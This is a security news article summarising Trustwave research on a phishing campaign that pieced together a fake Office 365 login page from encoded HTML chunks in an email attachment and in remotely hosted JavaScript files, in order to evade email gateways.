Trustwave researchers pointed out a new phishing campaign in which attackers used a clever trick to deliver web pages collecting Microsoft Office 365 credentials. The pages were assembled with chunks of HTML code stored locally and remotely.
The attackers hid HTML building blocks in JavaScript files and used those blocks to build a fake login interface that prompted the potential victim to type in their credentials.
The attacks started with an email about an investment. An attachment in the email appeared to be an Excel file (.XLSX), but in reality, the file was an HTML document with a chunk of an encoded text.
Having decoded the text, Trustwave researchers found more encoded text that was obfuscated with Entity codes. Using GCHQ’s CyberChef – a tool, often referred to as the cyber swiss army knife, that can be used for encryption, encoding, compression, and data analysis – they managed to find links to two JavaScript files hosted at “yourjavascript.com” domain. This domain is known to security researchers, as attackers had used it in other phishing campaigns.
The JavaScript files comprised two blocks of encoded text that were hiding HTML code, URL, and Base64 code.
One of them contained the first part of a phishing page and code that validates the victim’s email and password. Attackers wanted to make sure the password field was not blank and used regular expressions to confirm the victim entered their email address in a valid format.
The second file contained the ‘submit’ button, the ‘form’ tags, and code for a popup message telling victims that they logged out and needed to re-login.
The five chunks of HTML – the two JavaScript files and one the email attachment – assembled 367 lines of HTML code to build a Microsoft Office 365 phishing page.
Trustwave remarked this campaign was unusual in that the JavaScript was downloaded in obfuscated chunks from a remote storage and pieced together locally. This was a way to avoid detection by standard email security checks:
“This helps the attackers bypass security protections like Secure Email Gateways that might identify the malicious JavaScript from the initial attachment and block it,” the researchers explained.
In addition, the campaign operators filled in the victim’s email address automatically to increase the trust. The researchers noted the inventiveness of the attackers and their tricks in this campaign.
Trustwave says the URL receiving the stolen credentials for this campaign is still active. The researchers detailed their findings in a blog post yesterday.